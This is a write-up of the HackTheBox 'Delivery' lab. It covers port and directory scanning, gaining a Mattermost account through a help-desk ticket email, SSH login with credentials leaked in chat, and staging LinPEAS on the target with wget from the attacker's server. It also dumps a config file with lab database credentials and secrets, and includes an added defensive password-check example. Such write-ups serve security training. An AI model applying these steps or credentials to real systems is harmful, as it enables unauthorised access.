
【HackTheBox】Delivery - Writeup

Last updated at Posted at 2023-12-26

Introduction

This article is a writeup of Delivery 📝
This box is distinctive in that it calls for a different approach than usual.

Machine Info

Name: Delivery
IP Address:10.10.10.222
OS: Linux 🐧

Recon

Port Scan - Nmap

┌──(kali㉿kali)-[~/Desktop/work]
└─$ nmap 10.10.10.222 -Pn -v -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-23 05:28 JST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 05:28
Completed NSE at 05:28, 0.00s elapsed
Initiating NSE at 05:28
Completed NSE at 05:28, 0.00s elapsed
Initiating NSE at 05:28
Completed NSE at 05:28, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 05:28
Completed Parallel DNS resolution of 1 host. at 05:28, 0.04s elapsed
Initiating Connect Scan at 05:28
Scanning 10.10.10.222 [1000 ports]
Discovered open port 80/tcp on 10.10.10.222
Discovered open port 22/tcp on 10.10.10.222
Increasing send delay for 10.10.10.222 from 0 to 5 due to max_successful_tryno increase to 4
Increasing send delay for 10.10.10.222 from 5 to 10 due to max_successful_tryno increase to 5
Completed Connect Scan at 05:28, 40.94s elapsed (1000 total ports)
Initiating Service scan at 05:28
Scanning 2 services on 10.10.10.222
Completed Service scan at 05:29, 7.13s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.222.
Initiating NSE at 05:29
Completed NSE at 05:29, 8.36s elapsed
Initiating NSE at 05:29
Completed NSE at 05:29, 1.12s elapsed
Initiating NSE at 05:29
Completed NSE at 05:29, 0.00s elapsed
Nmap scan report for 10.10.10.222
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
|   256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_  256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Welcome
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 05:29
Completed NSE at 05:29, 0.00s elapsed
Initiating NSE at 05:29
Completed NSE at 05:29, 0.00s elapsed
Initiating NSE at 05:29
Completed NSE at 05:29, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.05 seconds

Ports 22 and 80 are open.

Name Resolution

Name resolution is required.
Add the following line to /etc/hosts:

10.10.10.222	delivery.htb

Site - delivery.htb

Accessing the site turns up pages like these.

Help Desk

Contact us

Mattermost Server

Enumeration

Let's look for anything else of interest.

FFuF

┌──(kali㉿kali)-[~/Desktop/work]
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://10.10.10.222/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.222/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 10850, Words: 486, Lines: 312, Duration: 308ms]
# on at least 3 different hosts [Status: 200, Size: 10850, Words: 486, Lines: 312, Duration: 307ms]
# Priority-ordered case-sensitive list, where entries were found [Status: 200, Size: 10850, Words: 486, Lines: 312, Duration: 308ms]
# directory-list-2.3-small.txt [Status: 200, Size: 10850, Words: 486, Lines: 312, Duration: 308ms]
#                       [Status: 200, Size: 10850, Words: 486, Lines: 312, Duration: 313ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 10850, Words: 486, Lines: 312, Duration: 309ms]
                        [Status: 200, Size: 10850, Words: 486, Lines: 312, Duration: 313ms]
images                  [Status: 301, Size: 185, Words: 6, Lines: 8, Duration: 314ms]
#                       [Status: 200, Size: 10850, Words: 486, Lines: 312, Duration: 313ms]
#                       [Status: 200, Size: 10850, Words: 486, Lines: 312, Duration: 314ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 10850, Words: 486, Lines: 312, Duration: 314ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 10850, Words: 486, Lines: 312, Duration: 315ms]

dirsearch

┌──(kali㉿kali)-[~/Desktop/work]
└─$ dirsearch -u http://delivery.htb
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/work/reports/http_delivery.htb/_23-12-23_05-38-13.txt

Target: http://delivery.htb/

[05:38:13] Starting: 
[05:39:03] 403 -  571B  - /assets/
[05:39:03] 301 -  185B  - /assets  ->  http://delivery.htb/assets/
[05:39:24] 301 -  185B  - /error  ->  http://delivery.htb/error/
[05:39:24] 200 -    1KB - /error/
[05:39:33] 403 -  571B  - /images/
[05:39:33] 301 -  185B  - /images  ->  http://delivery.htb/images/
[05:40:04] 200 -  648B  - /README.MD

Task Completed

The error page caught my attention, but there was nothing notable about it, so I will look more closely at the pages found earlier.

Help Desk

From here you can Open a New Ticket, Check Ticket Status, or Sign In.

A new ticket can be opened from here. Let's try filling it in.

A ticket id and an email address were issued.

Check the ticket we created with Check Ticket Status.

It shows test, as entered.

I remembered that there was also a Mattermost Server page. Let's access that one again.
We don't have an account, so create a new one from Create one now.
A problem comes up here. test@test is an address that does not actually exist, so email verification is impossible.

So let's try registering once more, this time with the email address we received when the ticket was issued.

Refreshing Check Ticket Status shows that the verify email has arrived.

http://delivery.htb:8065/do_verify_email?token=wuzojdkgk7camh58mpgookks8y1y8fs5ohbtfzhkd9obd9dxotfr7y6phpph8kfr&email=1794827%40delivery.htb

Accessing the URL that arrived in the mail completes verification, so try logging in again.

Mattermost

Login succeeded.

The chat log contains plenty of things that look like useful information.

① Credentials to the server are maildeliverer:Youve_G0t_Mail!

② Especially those that are a variant of "PleaseSubscribe!"

③ PleaseSubscribe! may not be in RockYou but if any hacker manages to get our hashes, they can use hashcat rules to easily crack all variations of common words or phrases.
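
Seen from the defender's side, message ③ means a complexity policy alone does not stop these passwords. The following is an added example, not part of the original writeup or of Mattermost: it applies the PasswordSettings values from this server's config.json next to a banned-base-phrase check. The function names, the folding table and the sample passwords are constructed for illustration.

```python
import re

# PasswordSettings as they appear in this server's config.json.
POLICY = {"MinimumLength": 10, "Lowercase": True, "Number": True,
          "Uppercase": True, "Symbol": True}

# Base phrases to refuse, stored without decoration; this is the phrase
# named in the chat messages.
BANNED_BASES = ["pleasesubscribe"]

# Assumed folding table: look-alike characters collapse into one class so
# that substitutions made by cracking rules (3 for e, 1 or ! for i/l, ...)
# compare equal to the plain phrase.
FOLD = str.maketrans("l1!|03@4$57", "iiiioeaasst")


def skeleton(text):
    """Lowercase, fold look-alikes, then drop everything that is not a-z."""
    return re.sub(r"[^a-z]", "", text.lower().translate(FOLD))


def meets_complexity(pw, policy=POLICY):
    """Check pw against the length and character-class rules only."""
    return all([
        len(pw) >= policy["MinimumLength"],
        not policy["Lowercase"] or any(c.islower() for c in pw),
        not policy["Uppercase"] or any(c.isupper() for c in pw),
        not policy["Number"] or any(c.isdigit() for c in pw),
        not policy["Symbol"] or any(not c.isalnum() for c in pw),
    ])


def banned_base(pw, bases=BANNED_BASES):
    """Return the banned phrase that pw is a variant of, or None.

    Containment covers prefixes, suffixes and doubling; the reversed
    comparison covers a reversed phrase.
    """
    skel = skeleton(pw)
    for base in bases:
        needle = skeleton(base)
        if needle in skel or needle in skel[::-1]:
            return base
    return None


def accept(pw):
    """A password is accepted only if it passes both checks."""
    return meets_complexity(pw) and banned_base(pw) is None


if __name__ == "__main__":
    # Constructed sample passwords, not values taken from the box.
    for pw in ["PleaseSubscribe!2024", "Pl3as3Subscr1be#7",
               "ebircsbuSesaelP!1", "correct-Horse-battery-9"]:
        print("%-26s complexity=%-5s banned_base=%s accept=%s"
              % (pw, meets_complexity(pw), banned_base(pw), accept(pw)))
```

The first three samples satisfy every complexity rule and are still rejected, which is the gap the chat message points at.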

Attempt - SSH connection

Port 22 was open, so let's try an SSH connection with maildeliverer:Youve_G0t_Mail!.

┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# ssh maildeliverer@10.10.10.222
maildeliverer@10.10.10.222's password: 
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan  5 06:09:50 2021 from 10.10.14.5

It worked. Got the User Flag as well.

maildeliverer@Delivery:~$ ls -lta
total 28
-r-------- 1 maildeliverer maildeliverer   33 Dec 22 15:23 user.txt
drwxr-xr-x 3 maildeliverer maildeliverer 4096 Jan  3  2021 .
lrwxrwxrwx 1 root          root             9 Dec 28  2020 .bash_history -> /dev/null
drwx------ 3 maildeliverer maildeliverer 4096 Dec 28  2020 .gnupg
-rw-r--r-- 1 maildeliverer maildeliverer  220 Dec 26  2020 .bash_logout
-rw-r--r-- 1 maildeliverer maildeliverer 3526 Dec 26  2020 .bashrc
-rw-r--r-- 1 maildeliverer maildeliverer  807 Dec 26  2020 .profile
drwxr-xr-x 3 root          root          4096 Dec 26  2020 ..
maildeliverer@Delivery:~$ cat user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX // 32-character user flag

Privilege Escalation

sudo -l

Checked which privileges maildeliverer can use, but sudo -l did not turn up anything.

maildeliverer@Delivery:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for maildeliverer: 
Sorry, user maildeliverer may not run sudo on Delivery.

Linpeas

We will use LinPEAS, so some preparation comes first.

① Start a server

┌──(kali㉿kali)-[~/Desktop/work]
└─$ python3 -m http.server 80 --bind 10.10.14.4
Serving HTTP on 10.10.14.4 port 80 (http://10.10.14.4:80/) ...

② Download LinPEAS (into the same directory the server was started from).

③ Run wget on the target machine to fetch linpeas.sh.

maildeliverer@Delivery:~$ wget http://10.10.14.4:80/linpeas.sh
--2023-12-22 16:53:28--  http://10.10.14.4/linpeas.sh
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847815 (828K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh         100%[===============>] 827.94K  6.79KB/s    in 2m 59s  

2023-12-22 16:56:28 (4.63 KB/s) - ‘linpeas.sh’ saved [847815/847815]

④ It cannot be run as-is because it has no execute permission, so grant it.

maildeliverer@Delivery:~$ chmod +x linpeas.sh

⑤ Run it (cute as ever today...)

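There is a lot of output, but the points that particularly caught my attention are the following.

Users with console

MySQL

There were many other points of interest, but no vulnerability in particular.

While looking through directories, I found a file named config.json in one of them.
Let's look at its contents.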

maildeliverer@Delivery:/opt/mattermost/config$ ls -lta
total 36
-rw-rw-r--  1 mattermost mattermost 18774 Dec 22 15:23 config.json
drwxrwxr-x 12 mattermost mattermost  4096 Jul 14  2021 ..
drwxrwxr-x  2 mattermost mattermost  4096 Dec 26  2020 .
-rw-rw-r--  1 mattermost mattermost   922 Dec 18  2020 cloud_defaults.json
-rw-rw-r--  1 mattermost mattermost   243 Dec 18  2020 README.md
maildeliverer@Delivery:/opt/mattermost/config$ cat config.json
{
    "ServiceSettings": {
        "SiteURL": "",
        "WebsocketURL": "",
        "LicenseFileLocation": "",
        "ListenAddress": ":8065",
        "ConnectionSecurity": "",
        "TLSCertFile": "",
        "TLSKeyFile": "",
        "TLSMinVer": "1.2",
        "TLSStrictTransport": false,
        "TLSStrictTransportMaxAge": 63072000,
        "TLSOverwriteCiphers": [],
        "UseLetsEncrypt": false,
        "LetsEncryptCertificateCacheFile": "./config/letsencrypt.cache",
        "Forward80To443": false,
        "TrustedProxyIPHeader": [],
        "ReadTimeout": 300,
        "WriteTimeout": 300,
        "IdleTimeout": 60,
        "MaximumLoginAttempts": 10,
        "GoroutineHealthThreshold": -1,
        "GoogleDeveloperKey": "",
        "EnableOAuthServiceProvider": false,
        "EnableIncomingWebhooks": true,
        "EnableOutgoingWebhooks": true,
        "EnableCommands": true,
        "EnableOnlyAdminIntegrations": true,
        "EnablePostUsernameOverride": false,
        "EnablePostIconOverride": false,
        "EnableLinkPreviews": true,
        "EnableTesting": false,
        "EnableDeveloper": false,
        "EnableOpenTracing": false,
        "EnableSecurityFixAlert": true,
        "EnableInsecureOutgoingConnections": false,
        "AllowedUntrustedInternalConnections": "",
        "EnableMultifactorAuthentication": false,
        "EnforceMultifactorAuthentication": false,
        "EnableUserAccessTokens": false,
        "AllowCorsFrom": "",
        "CorsExposedHeaders": "",
        "CorsAllowCredentials": false,
        "CorsDebug": false,
        "AllowCookiesForSubdomains": false,
        "ExtendSessionLengthWithActivity": true,
        "SessionLengthWebInDays": 30,
        "SessionLengthMobileInDays": 30,
        "SessionLengthSSOInDays": 30,
        "SessionCacheInMinutes": 10,
        "SessionIdleTimeoutInMinutes": 43200,
        "WebsocketSecurePort": 443,
        "WebsocketPort": 80,
        "WebserverMode": "gzip",
        "EnableCustomEmoji": true,
        "EnableEmojiPicker": true,
        "EnableGifPicker": true,
        "GfycatApiKey": "2_KtH_W5",
        "GfycatApiSecret": "3wLVZPiswc3DnaiaFoLkDvB4X0IV6CpMkj4tf2inJRsBY6-FnkT08zGmppWFgeof",
        "RestrictCustomEmojiCreation": "all",
        "RestrictPostDelete": "all",
        "AllowEditPost": "always",
        "PostEditTimeLimit": -1,
        "TimeBetweenUserTypingUpdatesMilliseconds": 5000,
        "EnablePostSearch": true,
        "MinimumHashtagLength": 3,
        "EnableUserTypingMessages": true,
        "EnableChannelViewedMessages": true,
        "EnableUserStatuses": true,
        "ExperimentalEnableAuthenticationTransfer": true,
        "ClusterLogTimeoutMilliseconds": 2000,
        "CloseUnusedDirectMessages": false,
        "EnablePreviewFeatures": true,
        "EnableTutorial": true,
        "ExperimentalEnableDefaultChannelLeaveJoinMessages": true,
        "ExperimentalGroupUnreadChannels": "disabled",
        "ExperimentalChannelOrganization": false,
        "ExperimentalChannelSidebarOrganization": "disabled",
        "ExperimentalDataPrefetch": true,
        "ImageProxyType": "",
        "ImageProxyURL": "",
        "ImageProxyOptions": "",
        "EnableAPITeamDeletion": false,
        "EnableAPIUserDeletion": false,
        "ExperimentalEnableHardenedMode": false,
        "DisableLegacyMFA": true,
        "ExperimentalStrictCSRFEnforcement": false,
        "EnableEmailInvitations": false,
        "DisableBotsWhenOwnerIsDeactivated": true,
        "EnableBotAccountCreation": false,
        "EnableSVGs": false,
        "EnableLatex": false,
        "EnableAPIChannelDeletion": false,
        "EnableLocalMode": false,
        "LocalModeSocketLocation": "/var/tmp/mattermost_local.socket",
        "EnableAWSMetering": false,
        "SplitKey": "",
        "FeatureFlagSyncIntervalSeconds": 30,
        "DebugSplit": false,
        "ThreadAutoFollow": true,
        "ManagedResourcePaths": ""
    },
    "TeamSettings": {
        "SiteName": "Mattermost",
        "MaxUsersPerTeam": 5000,
        "EnableTeamCreation": true,
        "EnableUserCreation": true,
        "EnableOpenServer": true,
        "EnableUserDeactivation": false,
        "RestrictCreationToDomains": "",
        "EnableCustomBrand": false,
        "CustomBrandText": "",
        "CustomDescriptionText": "",
        "RestrictDirectMessage": "any",
        "RestrictTeamInvite": "all",
        "RestrictPublicChannelManagement": "all",
        "RestrictPrivateChannelManagement": "all",
        "RestrictPublicChannelCreation": "all",
        "RestrictPrivateChannelCreation": "all",
        "RestrictPublicChannelDeletion": "all",
        "RestrictPrivateChannelDeletion": "all",
        "RestrictPrivateChannelManageMembers": "all",
        "EnableXToLeaveChannelsFromLHS": false,
        "UserStatusAwayTimeout": 300,
        "MaxChannelsPerTeam": 2000,
        "MaxNotificationsPerChannel": 1000000,
        "EnableConfirmNotificationsToChannel": true,
        "TeammateNameDisplay": "username",
        "ExperimentalViewArchivedChannels": true,
        "ExperimentalEnableAutomaticReplies": false,
        "ExperimentalHideTownSquareinLHS": false,
        "ExperimentalTownSquareIsReadOnly": false,
        "LockTeammateNameDisplay": false,
        "ExperimentalPrimaryTeam": "",
        "ExperimentalDefaultChannels": []
    },
    "ClientRequirements": {
        "AndroidLatestVersion": "",
        "AndroidMinVersion": "",
        "DesktopLatestVersion": "",
        "DesktopMinVersion": "",
        "IosLatestVersion": "",
        "IosMinVersion": ""
    },
    "SqlSettings": {
        "DriverName": "mysql",
        "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
        "DataSourceReplicas": [],
        "DataSourceSearchReplicas": [],
        "MaxIdleConns": 20,
        "ConnMaxLifetimeMilliseconds": 3600000,
        "MaxOpenConns": 300,
        "Trace": false,
        "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
        "QueryTimeout": 30,
        "DisableDatabaseSearch": false
    },
    "LogSettings": {
        "EnableConsole": true,
        "ConsoleLevel": "INFO",
        "ConsoleJson": true,
        "EnableFile": true,
        "FileLevel": "INFO",
        "FileJson": true,
        "FileLocation": "",
        "EnableWebhookDebugging": true,
        "EnableDiagnostics": true,
        "EnableSentry": true,
        "AdvancedLoggingConfig": ""
    },
    "ExperimentalAuditSettings": {
        "FileEnabled": false,
        "FileName": "",
        "FileMaxSizeMB": 100,
        "FileMaxAgeDays": 0,
        "FileMaxBackups": 0,
        "FileCompress": false,
        "FileMaxQueueSize": 1000,
        "AdvancedLoggingConfig": ""
    },
    "NotificationLogSettings": {
        "EnableConsole": true,
        "ConsoleLevel": "INFO",
        "ConsoleJson": true,
        "EnableFile": true,
        "FileLevel": "INFO",
        "FileJson": true,
        "FileLocation": "",
        "AdvancedLoggingConfig": ""
    },
    "PasswordSettings": {
        "MinimumLength": 10,
        "Lowercase": true,
        "Number": true,
        "Uppercase": true,
        "Symbol": true
    },
    "FileSettings": {
        "EnableFileAttachments": true,
        "EnableMobileUpload": true,
        "EnableMobileDownload": true,
        "MaxFileSize": 52428800,
        "DriverName": "local",
        "Directory": "./data/",
        "EnablePublicLink": false,
        "PublicLinkSalt": "8818u8uiz1n9rykuwgiqttfzgu6iixhz",
        "InitialFont": "nunito-bold.ttf",
        "AmazonS3AccessKeyId": "",
        "AmazonS3SecretAccessKey": "",
        "AmazonS3Bucket": "",
        "AmazonS3PathPrefix": "",
        "AmazonS3Region": "",
        "AmazonS3Endpoint": "s3.amazonaws.com",
        "AmazonS3SSL": true,
        "AmazonS3SignV2": false,
        "AmazonS3SSE": false,
        "AmazonS3Trace": false
    },
    "EmailSettings": {
        "EnableSignUpWithEmail": true,
        "EnableSignInWithEmail": true,
        "EnableSignInWithUsername": true,
        "SendEmailNotifications": false,
        "UseChannelInEmailNotifications": false,
        "RequireEmailVerification": true,
        "FeedbackName": "",
        "FeedbackEmail": "",
        "ReplyToAddress": "",
        "FeedbackOrganization": "",
        "EnableSMTPAuth": false,
        "SMTPUsername": "",
        "SMTPPassword": "",
        "SMTPServer": "localhost",
        "SMTPPort": "1025",
        "SMTPServerTimeout": 10,
        "ConnectionSecurity": "",
        "SendPushNotifications": true,
        "PushNotificationServer": "https://push-test.mattermost.com",
        "PushNotificationContents": "full",
        "PushNotificationBuffer": 1000,
        "EnableEmailBatching": false,
        "EmailBatchingBufferSize": 256,
        "EmailBatchingInterval": 30,
        "EnablePreviewModeBanner": true,
        "SkipServerCertificateVerification": false,
        "EmailNotificationContentsType": "full",
        "LoginButtonColor": "#0000",
        "LoginButtonBorderColor": "#2389D7",
        "LoginButtonTextColor": "#2389D7"
    },
    "RateLimitSettings": {
        "Enable": false,
        "PerSec": 10,
        "MaxBurst": 100,
        "MemoryStoreSize": 10000,
        "VaryByRemoteAddr": true,
        "VaryByUser": false,
        "VaryByHeader": ""
    },
    "PrivacySettings": {
        "ShowEmailAddress": true,
        "ShowFullName": true
    },
    "SupportSettings": {
        "TermsOfServiceLink": "https://about.mattermost.com/default-terms/",
        "PrivacyPolicyLink": "https://about.mattermost.com/default-privacy-policy/",
        "AboutLink": "https://about.mattermost.com/default-about/",
        "HelpLink": "https://about.mattermost.com/default-help/",
        "ReportAProblemLink": "https://about.mattermost.com/default-report-a-problem/",
        "SupportEmail": "feedback@mattermost.com",
        "CustomTermsOfServiceEnabled": false,
        "CustomTermsOfServiceReAcceptancePeriod": 365,
        "EnableAskCommunityLink": true
    },
    "AnnouncementSettings": {
        "EnableBanner": false,
        "BannerText": "",
        "BannerColor": "#f2a93b",
        "BannerTextColor": "#333333",
        "AllowBannerDismissal": true,
        "AdminNoticesEnabled": true,
        "UserNoticesEnabled": true,
        "NoticesURL": "https://notices.mattermost.com/",
        "NoticesFetchFrequency": 3600,
        "NoticesSkipCache": false
    },
    "ThemeSettings": {
        "EnableThemeSelection": true,
        "DefaultTheme": "default",
        "AllowCustomThemes": true,
        "AllowedThemes": []
    },
    "GitLabSettings": {
        "Enable": false,
        "Secret": "",
        "Id": "",
        "Scope": "",
        "AuthEndpoint": "",
        "TokenEndpoint": "",
        "UserApiEndpoint": ""
    },
    "GoogleSettings": {
        "Enable": false,
        "Secret": "",
        "Id": "",
        "Scope": "profile email",
        "AuthEndpoint": "https://accounts.google.com/o/oauth2/v2/auth",
        "TokenEndpoint": "https://www.googleapis.com/oauth2/v4/token",
        "UserApiEndpoint": "https://people.googleapis.com/v1/people/me?personFields=names,emailAddresses,nicknames,metadata"
    },
    "Office365Settings": {
        "Enable": false,
        "Secret": "",
        "Id": "",
        "Scope": "User.Read",
        "AuthEndpoint": "https://login.microsoftonline.com/common/oauth2/v2.0/authorize",
        "TokenEndpoint": "https://login.microsoftonline.com/common/oauth2/v2.0/token",
        "UserApiEndpoint": "https://graph.microsoft.com/v1.0/me",
        "DirectoryId": ""
    },
    "LdapSettings": {
        "Enable": false,
        "EnableSync": false,
        "LdapServer": "",
        "LdapPort": 389,
        "ConnectionSecurity": "",
        "BaseDN": "",
        "BindUsername": "",
        "BindPassword": "",
        "UserFilter": "",
        "GroupFilter": "",
        "GuestFilter": "",
        "EnableAdminFilter": false,
        "AdminFilter": "",
        "GroupDisplayNameAttribute": "",
        "GroupIdAttribute": "",
        "FirstNameAttribute": "",
        "LastNameAttribute": "",
        "EmailAttribute": "",
        "UsernameAttribute": "",
        "NicknameAttribute": "",
        "IdAttribute": "",
        "PositionAttribute": "",
        "LoginIdAttribute": "",
        "PictureAttribute": "",
        "SyncIntervalMinutes": 60,
        "SkipCertificateVerification": false,
        "PublicCertificateFile": "",
        "PrivateKeyFile": "",
        "QueryTimeout": 60,
        "MaxPageSize": 0,
        "LoginFieldName": "",
        "LoginButtonColor": "#0000",
        "LoginButtonBorderColor": "#2389D7",
        "LoginButtonTextColor": "#2389D7",
        "Trace": false
    },
    "ComplianceSettings": {
        "Enable": false,
        "Directory": "./data/",
        "EnableDaily": false
    },
    "LocalizationSettings": {
        "DefaultServerLocale": "en",
        "DefaultClientLocale": "en",
        "AvailableLocales": ""
    },
    "SamlSettings": {
        "Enable": false,
        "EnableSyncWithLdap": false,
        "EnableSyncWithLdapIncludeAuth": false,
        "IgnoreGuestsLdapSync": false,
        "Verify": true,
        "Encrypt": true,
        "SignRequest": false,
        "IdpUrl": "",
        "IdpDescriptorUrl": "",
        "IdpMetadataUrl": "",
        "ServiceProviderIdentifier": "",
        "AssertionConsumerServiceURL": "",
        "SignatureAlgorithm": "RSAwithSHA1",
        "CanonicalAlgorithm": "Canonical1.0",
        "ScopingIDPProviderId": "",
        "ScopingIDPName": "",
        "IdpCertificateFile": "",
        "PublicCertificateFile": "",
        "PrivateKeyFile": "",
        "IdAttribute": "",
        "GuestAttribute": "",
        "EnableAdminAttribute": false,
        "AdminAttribute": "",
        "FirstNameAttribute": "",
        "LastNameAttribute": "",
        "EmailAttribute": "",
        "UsernameAttribute": "",
        "NicknameAttribute": "",
        "LocaleAttribute": "",
        "PositionAttribute": "",
        "LoginButtonText": "SAML",
        "LoginButtonColor": "#34a28b",
        "LoginButtonBorderColor": "#2389D7",
        "LoginButtonTextColor": "#ffffff"
    },
    "NativeAppSettings": {
        "AppDownloadLink": "https://mattermost.com/download/#mattermostApps",
        "AndroidAppDownloadLink": "https://about.mattermost.com/mattermost-android-app/",
        "IosAppDownloadLink": "https://about.mattermost.com/mattermost-ios-app/"
    },
    "ClusterSettings": {
        "Enable": false,
        "ClusterName": "",
        "OverrideHostname": "",
        "NetworkInterface": "",
        "BindAddress": "",
        "AdvertiseAddress": "",
        "UseIpAddress": true,
        "UseExperimentalGossip": false,
        "EnableExperimentalGossipEncryption": false,
        "ReadOnlyConfig": true,
        "GossipPort": 8074,
        "StreamingPort": 8075,
        "MaxIdleConns": 100,
        "MaxIdleConnsPerHost": 128,
        "IdleConnTimeoutMilliseconds": 90000
    },
    "MetricsSettings": {
        "Enable": false,
        "BlockProfileRate": 0,
        "ListenAddress": ":8067"
    },
    "ExperimentalSettings": {
        "ClientSideCertEnable": false,
        "ClientSideCertCheck": "secondary",
        "EnableClickToReply": false,
        "LinkMetadataTimeoutMilliseconds": 5000,
        "RestrictSystemAdmin": false,
        "UseNewSAMLLibrary": false,
        "CloudUserLimit": 0,
        "CloudBilling": false,
        "EnableSharedChannels": false
    },
    "AnalyticsSettings": {
        "MaxUsersForStatistics": 2500
    },
    "ElasticsearchSettings": {
        "ConnectionUrl": "http://localhost:9200",
        "Username": "elastic",
        "Password": "changeme",
        "EnableIndexing": false,
        "EnableSearching": false,
        "EnableAutocomplete": false,
        "Sniff": true,
        "PostIndexReplicas": 1,
        "PostIndexShards": 1,
        "ChannelIndexReplicas": 1,
        "ChannelIndexShards": 1,
        "UserIndexReplicas": 1,
        "UserIndexShards": 1,
        "AggregatePostsAfterDays": 365,
        "PostsAggregatorJobStartTime": "03:00",
        "IndexPrefix": "",
        "LiveIndexingBatchSize": 1,
        "BulkIndexingTimeWindowSeconds": 3600,
        "RequestTimeoutSeconds": 30,
        "SkipTLSVerification": false,
        "Trace": ""
    },
    "BleveSettings": {
        "IndexDir": "",
        "EnableIndexing": false,
        "EnableSearching": false,
        "EnableAutocomplete": false,
        "BulkIndexingTimeWindowSeconds": 3600
    },
    "DataRetentionSettings": {
        "EnableMessageDeletion": false,
        "EnableFileDeletion": false,
        "MessageRetentionDays": 365,
        "FileRetentionDays": 365,
        "DeletionJobStartTime": "02:00"
    },
    "MessageExportSettings": {
        "EnableExport": false,
        "ExportFormat": "actiance",
        "DailyRunTime": "01:00",
        "ExportFromTimestamp": 0,
        "BatchSize": 10000,
        "DownloadExportResults": false,
        "GlobalRelaySettings": {
            "CustomerType": "A9",
            "SmtpUsername": "",
            "SmtpPassword": "",
            "EmailAddress": "",
            "SMTPServerTimeout": 1800
        }
    },
    "JobSettings": {
        "RunJobs": true,
        "RunScheduler": true
    },
    "PluginSettings": {
        "Enable": true,
        "EnableUploads": false,
        "AllowInsecureDownloadUrl": false,
        "EnableHealthCheck": true,
        "Directory": "./plugins",
        "ClientDirectory": "./client/plugins",
        "Plugins": {},
        "PluginStates": {
            "com.mattermost.nps": {
                "Enable": true
            },
            "com.mattermost.plugin-channel-export": {
                "Enable": true
            },
            "com.mattermost.plugin-incident-management": {
                "Enable": true
            }
        },
        "EnableMarketplace": true,
        "EnableRemoteMarketplace": true,
        "AutomaticPrepackagedPlugins": true,
        "RequirePluginSignature": false,
        "MarketplaceUrl": "https://api.integrations.mattermost.com",
        "SignaturePublicKeyFiles": []
    },
    "DisplaySettings": {
        "CustomUrlSchemes": [],
        "ExperimentalTimezone": true
    },
    "GuestAccountsSettings": {
        "Enable": false,
        "AllowEmailAccounts": true,
        "EnforceMultifactorAuthentication": false,
        "RestrictCreationToDomains": ""
    },
    "ImageProxySettings": {
        "Enable": false,
        "ImageProxyType": "local",
        "RemoteImageProxyURL": "",
        "RemoteImageProxyOptions": ""
    },
    "CloudSettings": {
        "CWSUrl": "https://customers.mattermost.com"
    }

A lot is written here, but the part to focus on is the following.

    "SqlSettings": {
        "DriverName": "mysql",
        "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
        "DataSourceReplicas": [],
        "DataSourceSearchReplicas": [],
        "MaxIdleConns": 20,
        "ConnMaxLifetimeMilliseconds": 3600000,
        "MaxOpenConns": 300,
        "Trace": false,
        "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
